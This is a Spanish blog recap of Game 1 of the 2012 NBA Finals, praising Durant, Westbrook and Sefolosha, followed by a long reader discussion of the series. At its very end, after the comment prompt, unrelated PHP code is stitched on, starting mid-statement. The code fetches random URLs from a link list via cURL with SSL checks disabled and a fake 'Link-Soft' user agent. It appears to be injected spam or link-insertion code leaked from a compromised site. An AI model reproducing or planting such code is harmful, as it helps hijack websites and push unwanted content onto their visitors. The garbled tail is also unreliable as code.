La Crónica: Segundas partes siempre fueron buenas

13 de June de 2012 por TheDeerHunter

La historia nos suena. Los Thunder aguantan sin descomponerse un intenso castigo en los primeros compases del choque. Tras el descanso Kevin Durant se pone en modo ejecutor aprovechando el efecto del desgaste físico en la intensidad defensiva rival. Todo termina cayendo por su propio peso. Lo hemos visto durante toda la postemporada.

Anoche, en medio de los cánticos de “¡MVP, MVP!” de la parroquia del Chesapeake, Durant lo volvía a hacer: 23 de sus 36 puntos llegaron en el segundo tramo. Estamos hablando de la segunda mejor anotación de un debutante en una final después de Iverson. El efecto demoledor se complementó con los 18 puntos de Westbrook. Ellos 2 solos superaron a los Heat al completo en esa segunda parte por 41 a 40. Westbrook, por cierto, es el primer jugador en firmar como mínimo 25 puntos, 8 rebotes y 10 asistencias desde un tal Charles Barkley en 1993.

Nos preguntábamos ayer quienes serían los encargados de defender a Lebron y Durant, respectivamente. En los 3 primeros cuartos, fue el mismo #35 el que se encargó de defender al alero de los Heat pero su marca no funcionó. Fue el suizo Sefolosha el factor clave para terminar de controlar el último cuarto. Bajo su defensa, James se colapsó en 6 puntos por debajo del 30% de acierto. Por su parte, los Heat decidieron alternar a Shane Battier con la curiosa opción de Wade sobre Durant. Tampoco parece que lograran excesivos buenos resultados.

Otros apuntes a tener en cuenta: Los Heat no pudieron correr. Tremendos solitarios 4 puntos, por los 24 de los Thunder en su salsa. Cuando el contraataque no viene producto de robos y pérdidas de balón tiene que venir vía rebotes y los locales dominaron 43 a 35 esta faceta. Mención especial al inmenso trabajo de Collison.

Los Heat fueron perdiendo paulatinamente su confianza en el tiro medio-largo y con ello sus opciones de ataque ante una defensa muy bien armada por dentro. Durante el primer cuarto lanzaron más tiros de 3 metros que en el resto del choque, el momento donde causaron verdaderas dificultades a la defensa de Brooks.

No fue el día ni de Bosh ni de Harden. Sin embargo sí aportaron otros secundarios como Battier, Chalmers, Ibaka, los mencionados Collison y Sefolosha, además de, no me resisto a destacarlo, el gran trabajo de Fisher.

PREMIOS

MVP: Nos estamos quedando sin calificativos para describir a Kevin Durant. Primer partido en una final de la NBA y lo celebra con 36 puntos, 17 de ellos en el último cuarto. Los números de Russell Westbrook también son para enmarcar: 27 puntos, 8 rebotes y 11 asistencias.

Sorpresa: Thabo Sefolosha es pieza indispensable en estos Thunder. Gran defensa sobre Lebron en el último cuarto, puntos, asistencias de cara al tendido, energía… Su aportación es crítica. Los secundarios de los Heat también jugaron un gran partido. 17 puntos para Shane Battier y 10 para Mario Chalmers.

Decepción: Hace falta mucho más de Dwyane Wade. Mucho más. Chris Bosh y James Harden tampoco vivieron una de sus mejores noches.

Esfuerzo en vano: Este año el juego de los Heat empieza y acaba en Lebron James. 30 puntos, 9 rebotes, 4 asistencias y 4 robos que solo sirvieron para engrosar sus estadísticas.

Imágenes | AP Photos / Getty Images

Comenta

31 comentarios a esta entrada

  1. Pcerezo dice:
    #1

    No sé si al final ganarán o no, si estoy exagerando o no, no lo sé, pero está claro que estamos ante un mito del baloncesto. Si todos sigue su curso, si no hay nada raro, Durant va a ser un mito del baloncesto.

      Citar

  2. GreenPride dice:
    #2

    Pues pasó el primer partido y la verdad queda una sensación de superioridad Thunder que veremos si se confirma en el resto de la serie. Como titular yo diría que si Durant produce más que LeBron y Westbrook también supera a Wade (en ambos casos claramente) y Harden-Bosh no son factor los Heat tienen muy poquito que hacer en estas Finales ya que el resto de equipo Thunder es superior al resto de equipo Heat.
    Pero vayamos por partes. De inicio unos Heat super tranquilos hicieron valer sus experiencia en finales anteriores para salir con más calma y ejecutar sus ataques mucho mejor que los Thunder que notaban el nerviosismo de sus primeras finales (excepto Durant). Todo el mundo tocaba el balón en un equipo de Miami que jugaba como tal quizás por primera vez en estos Playoffs. Battier y Chalmers metían sus puntos, Bosh hacía daño en pick&roll y tiros abiertos y LeBron y Wade aportaban sin excederse en tiros. Los Thunder no encontraban su manera de defender, lastrados muchas veces por la incapacidad de Perkins de seguir a jugadores muchos más rápidos que él. Sin embargo se mantenían más o menos gracias a Durant a pesar de que Westbrook no entraba en el partido y aunque las diferencias llegaron hasta los 13 puntos para los de Florida nunca llegaron a irse del partido. De esta parte del partido sorprendió Brooks poniendo a Durant sobre LeBron en defensa y la verdad que sufrió Durantula para poder parar su fuerza en las entradas, mientras que en la otra parte Durant quedaba para Battier y LeBron se iba con Perkins .
    Entrado el segundo cuarto los Thunder empezaron a defender mejor (ya sin Perkins y con Collison en el campo) pero los Heat continuaron atacando bien y llegaron por delante al descanso de 7 con las primeras señales de Westbrook y con Ibaka sumando para los Thunder. Sensación de que los Heat llevaban la inicitiva y que los dos equipos habían estado tanteándose mucho de cara al resto de las series pues todavía los grandes espadas no habían aparecido del todo.
    Y fue empezar el segundo tiempo y empezó la tormenta. Los Thunder subieron su defensa varios puntos empezando a sacar contraataques y Durant y Westbrook empezaron a anotar con más asiduidad. La fluidez ofensiva desapareció en los Heat que empezaron a necesitar los puntos de LeBron mucho más que en la primera mitad. Con un Wade muy fallón como durante la mayoría de estos Playoffs, los de Oklahoma fueron tomando poco a poco el control metidos ya de lleno en una exhibición (una más) de KD. De todos los colores se las metió el bueno de Durantula a los Heat incapaces de frenarle en la segunda mitad (en realidad durante todo el partido). Nada menos que 36 puntos con grandes porcentajes, 4 triples, 8 rebotes y 4 asistencias. Battier no sabía que hacer, si se separaba le metía una suspensión y si se acercaba Durant penetraba para lanzar por encima suya y seguir sumando. Se echó en falta un cambio defensivo y que los Heat pusieran a LeBron a defenderle cosa que seguro que vamos a ver más pronto que tarde en estas series. Enfrente LeBron se quedó casi sin apoyos y la ineficacia de los de Miami para sumar puntos desde fuera de la zona fue haciendo cada vez más sencillo para los Thunder defenderles. Con el rebote perdido, sin poder forzar pérdidas los de Miami se quedaron sin canastas fáciles con las que paliar la falta de puntos de Wade y Bosh y el partido acabó claramente en manos de los Thunder, mucho más intensos y mejores en ataque… y asusta pensar que fue en un partido totalmente anormal de Harden que prácticamente no tuvo incidencia en el juego de ataque (sí en defensa, haciendo un gran trabajo sobre Wade e incluso a ratos sobre LeBron). Además Sefolosha tomó el relevo de Durant y se pegó como una lapa a LeBron consiguiendo que no le fuera sencillo anotar.
    Esto es muy largo, no podemos sentenciar nada pero las primeras sensaciones son muy favorables a OKC. Sus estrellas están a gran nivel, sus secundarios cumplen con nota y parecen tener más recursos que los Heat y una defensa que se adapta mejor a las virtudes de Miami que al revés. Miami necesita mucha mayor aportación y acierto por parte de Wade-Bosh para poder ganar estas finales. Si no están a gran nivel lo van a tener casi imposible. Además Spoelstra tendrá que hacer algo en defensa para parar a Durant-Westbrook que sumaron puntos con facilidad, sobre todo Durant y evitar ese juego fluido que les hizo polvo en la segunda mitad. Espero más pronto que tarde ver a LeBron sobre Durant ya que es el único Heat con posibilidades de defenderle. También necesitan ser mucho más agresivos en ataque y aunque se lleven algún tapón de Ibaka (0 ayer), deben de forzar para tirar más tiros libres.
    Veremos como ajustan los Heat y si hay un cambio de rumbo de la serie.
    Gran crónica, dando en el clavo con las claves.

      Citar

  3. nba dice:
    #3

    Yo creo que los Heat tienen que asumir que Durant va a anotar si o si, da igual a quien pongan delante .
    Lo que tienen que hacer , si quieren tener alguna opcion de ganar la serie es , que Westbrook no se sienta comodo y no este acertado

      Citar

  4. simon dice:
    #4

    Ayer asistimos al nacimiento definitivo de una leyenda la de KD…
    Vaya jugador es Sefolosha… madremia, yo pensaba que no iba a poder defender a Lebron por la fuerza de este pero nada mas lejos de la realidad, uno de los 3 mejores defensores perimetrales de la liga ( sino el mejor ) y en ataque no aparece mas en lo que tiene que aparecer y cuando tiene que aparecer… menudo jugador.
    Westbrook está demostrando definitivamente su madurez..
    PD: Yo no se los demás que opinabais antes del partido, pero creo que el partido no se salió ni un pelo del guión que esperabamos.

      Citar

  5. sempren dice:
    #5

    Gran crónica, no solo la de TheDeerHunter, sino también la de GreenPride, como siempre muy buena.

    Vaya finales, parece que a la altura de las de conferencia.

      Citar

  6. GreenPride dice:
    #6

    Totalmente de acuerdo con simon, el partido se ajustó en gran medida a las predicciones que se podían hacer antes del partido. Es de esperar que para el segundo ambos ajusten y podamos ver nuevas cosas de aquí en adelante, desde luego los Heat lo necesitan para poder hacer algo.
    sempren, gracias por el piropo, siempre gusta oir que a alguien le gusta una crónica… el primer partido no ha estado mal pero para llegar a ser como las de conferencia tendrán que ser unas finales igualadas. Yo creo que lo van a ser, pero todavía está por ver…

      Citar

  7. Heineken dice:
    #7

    Heineken: Jugando con Westbrook-Harden-Durant-Sefo-Ibaka/Perkins

    Sefolosha sobre LeBron

    Esto dije yo cuando preguntaron como parar a LeBron si juega de 4.

    Al final jugaron más con Fisher que con Harden y con Collison que con Perkins pero vamos, esta claro que Brooks sabe a quien poner y cuando en el momento adecuado y como jugar los momentos decisivos del partido.

    Las 2ºs partes de los partidos tienen un nombre propio: Kevin Durant

      Citar

  8. GreenPride dice:
    #8

    Tremendo dato: En un momento del último cuarto y quitando el primer cuarto (o los 2 primeros no estoy seguro) los Heat llevaban 3 de 29 en tiros a más de 3 metros del aro. Dice mucho de cómo se fueron atascando los Heat a medida que fue pasando el partido y su incapacidad para desatascar la zona y la defensa Thunder

      Citar

  9. Pop dice:
    #9

    A mí ver a Durant me produjo ayer que me viniera a la cabeza la escena de Space Jam cuando los aliens están haciendo “scouting” en los partidos de la NBA y ven a Barkley. Su comentario es: “Oh, un Aniquilador!”.

    Eso es KD ahora mismo, un Aniquilador total.

      Citar

  10. Esteban dice:
    #10

    El factor X, el cansancio, el thunder barrio a dallas, casi barre a lakers y gano algunos juegos comodos frente a spurs

    El heat tuvo 5 juegos frente a knicks, algunos bastante duros, sin bosh tuvieron 6 con los pacers, donde wade y lebron debieron jugar 44 minutos super intensos para pasar la serie, sobretodo lebron q jugo inhumanamente, y 7 choques durimos con celtics, incluyendo suplementarios y una serie q termino hace 3 dias, mientras q el thunder viene de una semana entera de descanso, sin dejar de resaltar q son un equipo mucho mas joven que el heat

    Para colmo spolstra decide hacer jugar todo el partido a 6 jugadores, lo q hizo q lleguen al final del juego como expectadores de la velocidad y energia del thunder,

    Yo hubiese “tirado” este juego uno, dando mucho descanso a las figuras, y ganando algunos dias para llegar algo mas frescos al juego dos, repito el thunder venia con una semana de descanso, y el heat de sufrir horrores con los celtics

    Ahora con el resultado puesto, podemos decir que el heat no descanso sino que por el contrario se desgasto aun mas, y q no les sirvio de nada

    Juegos como el de anoche ya vimos en la serie con san antonio, primer cuarto con gran diferencia para el visitante y algo del segudno, para que en la segunda mitad nadie les pueda seguir el ritmo al thunder

    PD: durant pinta para ser una leyenda detras de jordan, solo tiene un año mas que los q tenia lebron cuando llevo a cavs a las finales, pero durant se despacho con 36 puntosn y 17 EN EL ULTIMO cuarto, no he visto nada igual desde duncan en el 99

      Citar

  11. Esteban dice:
    #11

    Inteligente broks con poner a shefolosha sobre lebron al final del juego, para mi lo dejo hacer durante todo el partido, como diciendo, dale tio cansate, q cuando estes cansado te pongo a este chaval y desapareces

    Creo q paso eso, sobre el final del juego cada penetracion de lebron termino en un mal tiro o en pase desde la penetracion

      Citar

  12. German dice:
    #12

    Ojala KD gane muchos anillos, da espectaculo todas las noches. Enorme partido de Collison, creo que deberia ser titular en lugar de Perkins o en su defecto jugar mas minutos. Es mucho mejor ofensivamente y en defensa es igual de bueno que Perkins y aunque no fuera asi no deberia importar mucho ya que no hay un pivot del Heat al cual defender.
    Buenos numeros de Westbrook pero con varios tiros tomados absurdamente, aunque se lo nota un poco menos descerebrado que en otros tiempos, si sigue mejorando eso va a ser el complemento perfecto para el crack de Durant.
    Cuanto vale la experiencia de un jugador como Fisher en unas finales, muy valioso su aporte en los 25 minutos que estuvo en cancha.
    En cuanto a Miami creo que el cansancio peso sobretodo al final, Spoelstra no roto practicamente y fue gracias a los bombazos de Chalmers y Battier (como defiende este señor!!) que se mantuvo arriba hasta casi el final del tercer cuarto.

      Citar

  13. Nacho dice:
    #13

    De Durant no voy a hablar, porque aburre. (No él, lo que digamos de él, me refiero)
    Coincido con Esteban en lo de Brooks con Shefolosa. Para mí el gran artífice de la victoria. Defensa impresionante. No sólo el último cuarto, sino los 6 primeros minutos de la reanudación. El único momento bueno de Miami en la segunda parte coincidió con él en el banco. Lo que no me queda claro es si el bueno de Scott lo volvió a sacar por las faltas de Harden, o porque era imprescindible. Por lo demás el coach de OKC sigue demostrándome sapiencia. Pocos dejan fluir el partido con gente no habitual porque realmente está saliendo bien la cosa.
    Por parte de Miami me gustó mucho el inicio. Cuando les dio por mover la bola. Como dijo Daimiel, parecían los Spurs de Miami. Battier enchufadísimo, Chalmers en estado de gracia. Y el equipo moviendo la bola. Lo que me jode de estos tipos (el equipo me refiero), es que su segunda parte vuelven al guión estrellitas, y pasan de mover la bola. Y si a eso unes la tuerca más apretada por parte de los Thunder… pasa lo que pasa. Que un tipo que será leyenda disfruta, y nos hace disfrutar.
    Hablo ahora de mis ‘odiados’:
    LeBron estuvo bien. Jugó más en equipo que otros días, y eso conviene (ver 1ª parte) Aún así en la segunda, cuando se vuelven individualistas, no me disgustó del todo. Empezó el último cuarto en modo desastre total, pero luego se enchufó algo. De todas formas creo que goza de tiros libres que se los dan por ser vos quien sois. (ahora, OKC no se puede quejar, que el suizo tiro cuatro de procedencia, al menos, dudosa)
    Westbrook. Ay!, tuvo momentos pa matarlo. Pero tuvo momentos sublimes. Probablemente me tenga que acostumbrar a que él es así, para lo bueno y para lo malo. Ayer tuvo la suerte de los campeones. Tomar decisiones equivocadas, y terminar anotando. Y eso solo le pasa a los grandes. Por cierto decir también que sin él, el efecto Shefolosa no sería el mismo.

      Citar

  14. Ru dice:
    #14

    Pues nada,una vez más Oklahoma.Quizás los haya visto más desconectados que nunca en estos playoffs,sobrepasados por las circunstancias o porque Miami tiró de más experiencia en estas lides.Westbrook no se encontró en la primera mitad y OKC aguantó con Durant.Hasta la segunda mitad del tercer cuarto no se vio a los Thunder de siempre,ahí ya totalmente liberados de cualquier atadura en forma de presión,la energía de Selofosha,el impetú de Westbrook y la clase de Durant la liaron y dieron la vuelta al resultado.Durant 1 – LeBron 0,James jugó bastante bien pero echando de menos más Wade y más Bosh.

    Esta noche segundo acto.

      Citar

  15. Sancho88 dice:
    #15

    Ru, no hay nada de sorprendente en la remontada de ayer de Oklahoma, llevan haciendo eso durante todos los playoffs como bien apunta Deer. Símplemente, son todos muy buenos atacando y en defensa muy disciplinados. Son imbatibles en realidad. Lebron sabe que no tiene nada que hacer. Será otra temporada sin anillo para él

      Citar

  16. Ru dice:
    #16

    Ya Sancho,el abc de Oklahoma en postemporada es ese,primera mitad abajo y segunda mitad jugando de manera excelsa y remontada,pero si vi ciertos detalles en la primera parte que les pillaron un poco en fuera de juego,posiblemente hasta que no supieron como cerrar a LeBron que parecía indefendible.

      Citar

  17. Sancho88 dice:
    #17

    Puede ser, todos vimos ciertas dudas un poco en la primera parte, pero también vimos que Miami iba a saco, concentrados e intensos a un nivel que estaba claro que no iban a poder mantener durante todo el partido. Brooks ajustó atrás y el talento se acabó imponiendo. Pero por lo demás, tampoco hubo fisuras reales, si acaso cierta incertidumbre por por los 60 puntos en la primera parte. Lo resolvieron aplicando el castigo que se han llevado los Mavs, Lakers y San Antonio. Ahora Miami tb. Unos 5 minutos a pan y agua en el tercer cuarto que te dejan K.O. sin anotar, te remontan, y luego ya sabes que perderás por la parejita KD-RW. Es asombroso que un grupo de chavales tan jóvenes lo tengan tan claro. No sé si la serie llegará al sexto partido ni siquiera…

      Citar

  18. GreenPride dice:
    #18

    Sancho, creo que menosprecias lo que puedan hacer los Heat en estas series. Es cierto que mis favoritos son los Thunder pero no creo que los de Miami vayan a rendir el fuerte tan fácilmente como tú crees. Tienen 3 de los mejores jugadores de la competición y a poco que Wade y Bosh ayuden un poco más a LeBron pueden meter en problemas a los Thunder. Me sorprendería mucho que la serie no llegara al menos al 6º partido y todavía les doy alguna opción de anillo a los Heat.
    Vamos a ver que pasa esta noche en un importantísimo 2º partido. Creo que los Heat deberían en defensa intentar minimizar la aportación de Westbrook y bajar los porcentajes de Durant aunque no les será fácil. Espero ver a LeBron sobre Durant en la segunda parte del 2º partido creándole más problemas que Battier y a Wade y Bosh más agresivos en ataque. Por los Thunder, seguramente empezaremos a ver a Harden en ataque

      Citar

  19. Sancho88 dice:
    #19

    Green, no estoy menospreciando el talento de los Heat, así como no lo hice en la eliminatoria contra Lakers, ni mucho menos en la de los Spurs. Solamente intento ser lo más aséptico y reflexivo posible, estudiando las capacidades de ambos equipos, las dinámicas, etc. Hay que recordar que los Heat llegan aquí con muchas más heridas, mientras que los Thunder son el ‘macho dominante’ de los playoffs. Siempre que han ido a por la victoria la han conseguido, y ha habido veces incluso en la que se la han encontrado sin buscarla, como en los dos partidos que tenía Lakers prácticamente finiquitados a su favor. Así, mi punto de vista es totalmente analítico. Ok, si quieres llevamos la serie hasta el sexto juego, pero no creo que cambie nada un 4-1 por un 4-2. De momento, viendo lo que han ido haciendo los dos equipos en todas las eliminatorias, y viendo lo que pasó anteayer, nada me ahce esperar un séptimo encuentro. El análisis puro y duro le otorga dos victorias como mucho a los Heat. Todo lo que sea esperar más de esas dos victorias, para mí es entrar en el terreno de la adivinación. Y con estos Thunder poquitas sorpresas. Son netamente superiores, lo demuestran siempre o casi siempre, y ante eso hay muy poquito que hacer. Además, hablas de un partido clave esta noche. Ok, estoy de acuerdo. Pero nada hace indicar que Miami vaya a rascar absolutamente nada del Cheasapeake. Los Thunder llevan un clarividente 9-0 en su campo en todas las eliminatorias. Dame algún resquicio real para suponer que Miami asaltará la cancha de los Thunder esta noche. Yo no lo veo por ningún lado. A mi juicio, Miami rascará lo que sea capaz de arañar en su cancha, donde puede sacar dos de los tres partidos como mucho, y si se despitan solo 1. Por eso veo la serie muerta como mucho en el sexto juego

      Citar

  20. GreenPride dice:
    #20

    Sancho, si a día de hoy yo tuviese que jugarme algo a un resultado, lo haría por el Thunder en 6 tal como dices tú. Sin embargo este año hemos visto vuelcos espectaculares en las eliminatorias que en los anteriores partidos de ellas no parecía que pudieran ocurrir por ningún lado (finales de conferencia) y los Heat tienen armas como para inquietar a cualquiera. Sin ir más lejos dices que los Thunder han ganado siempre que han ido a por la victoria ¿Que pasó en los 2 primeros partidos de las finales de conferencia? ¿Se dejaron ganar por los Spurs? Creo que les ganaron bien y casi todo el mundo entonces decía que no se veía como los Thunder podían dar la vuelta a esa eliminatoria porque los Spurs parecían claramente superiores…. y mira lo que pasó al final.
    Dicho esto, estoy de acuerdo en casi todo lo que has dicho, sólo digo que todavía sí veo algunas opciones a Miami y creo que si los Heat consiguen ajustar algo en defensa y que Wade-Bosh metan más podrían dar el vuelco… aunque todo parezca indicar lo contrario ahora mismo

      Citar

  21. Sancho88 dice:
    #21

    Green, creo que en los dos primeros partidos de las finales Oklahoma no fue realmente a por todas, Westbrook estuvo fatal, la defensa no había ajustado nada, Ibaka apenas tenía protagonismo, etc. etc. Si comparas esos dos partidos con el resto de la final, y con el partido de ayer, creo que no hay color, porque ahora Westbrook asiste fácil, se juega menos tiros y sobre todo con más sentido, los pívots están integrados, Sefolosha y Fisher asustan… etc., etc. Las cosas han cambiado mucho desde esos dos primeros partidos, sobre todo en la actitud de Oklahoma.

      Citar

  22. melo15 dice:
    #22

    Primera Finales que veo y de momento estan siendo muy divertidas.
    Los Heat en este 2 partido se estan comiendo a lo Thunder, controlando a Westbrook y sobretodo a Durant que esta FATAL, solo Harden y Ibaka mantienen a su equipo en el partido.
    Por parte de los Heat todos bastante bien, el Big3 perfecto todos aportando en todo, Cole, Haslem, Chalmers y sobretodo Battier estan aportando mucho.
    PD: Battier es el tio mas inteligente que conozco, en ataque super efectivo y verle defender es una delicia.
    Ha porovocado una falta en ataque a Durant en el 3 quarto de manual.

      Citar

  23. melo15 dice:
    #23

    Final del tercer quarto y los Heat siguen aguantando, por parte de los de Florida Lebron fantastico en ataque y en defensa, Wade muy bien anotando tiros de media distancia, Bosh reboteando y anotando aunque esta perdiendo algunos balones y Battier estelar. Tambien bastante bien los suplentes de Miami, Cole, Jones…
    Por parte de OCK, el mejor Westbrook, es verdad que esta tomando algunas malas decisiones y no esta dirigiendo muy bien pero si los Thunder estan tan cerca es gracias a el. Harden en modo off este 3 quarto y Durant decepcionando, 4 faltas, forzando tiros, muy intermitente.
    Realmente es un tira y afloja los Thunder a 9 Miami a 12…
    PD: Extraordinario el trabajo bajo los tableros de Chris Bosh, muchos rebotes ofensivos.

      Citar

  24. melo15 dice:
    #24

    Durant 5 faltas y Brooks que no lo cambia, erro a mi juicio.

      Citar

  25. Esteban dice:
    #25

    Gano el heat, igual el campeon a mi gusto es anecdotico, lo importante en estas finales es que durant esta promediando 17 puntos en los ultimos cuartos? Wow envidia para MJ, nadie igual eh visto salvo shaq

      Citar

  26. GreenPride dice:
    #26

    Pues victoria de Miami y la cosa se pone interesante. Así de primeras decir que tal como sospechaba Wade y Bosh han sido mucho más agresivos y su actuación ha sido muy importante pero las verdaderas claves ha sido el trabajo de Battier (5 triples), la caraja inicial de OKC que les ha tenido a remolque todo el partido y los problemas de faltas de Westbrook y sobre todo de Durant. Dicho lo cual OKC casi remonta y sigo viéndolos favoritos. Más luego en su post correspondiente

      Citar

  27. Txusma dice:
    #27

    GreenPride:
    Pues victoria de Miami y la cosa se pone interesante. Así de primeras decir que tal como sospechaba Wade y Bosh han sido mucho más agresivos y su actuación ha sido muy importante pero las verdaderas claves ha sido el trabajo de Battier (5 triples), la caraja inicial de OKC que les ha tenido a remolque todo el partido y los problemas de faltas de Westbrook y sobre todo de Durant. Dicho lo cual OKC casi remonta y sigo viéndolos favoritos. Más luego en su post correspondiente

    Tenemos problemas hoy para sacar una crónica. La querrías escribir tu, GreenPride? Me la puedes enviar a la dirección de contacto: txusma @ tjnba.com.
    O si alguien quiere hacerlo, nos haría todo un favor.

      Citar

  28. GreenPride dice:
    #28

    Txusma: Tenemos problemas hoy para sacar una crónica. La querrías escribir tu, GreenPride? Me la puedes enviar a la dirección de contacto: txusma @ tjnba.com.
    O si alguien quiere hacerlo, nos haría todo un favor.

    No hay problema, te mando ahora mismo la mía y si te parece bien la cuelgas. En breve te la paso

      Citar

  29. Txusma dice:
    #29

    GreenPride: No hay problema, te mando ahora mismo la mía y si te parece bien la cuelgas. En breve te la paso

    Muchas gracias!

      Citar

  30. GreenPride dice:
    #30

    Ya te la he enviado Txusma. Un honor si decidís poner mi crónica nada menos que de un partido de las Finales. Un saludo

      Citar

  31. TheDeerHunter dice:
    #31

    ¿Un honor? Ya nos hubiera gustado poner unas cuantas más XD XD XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>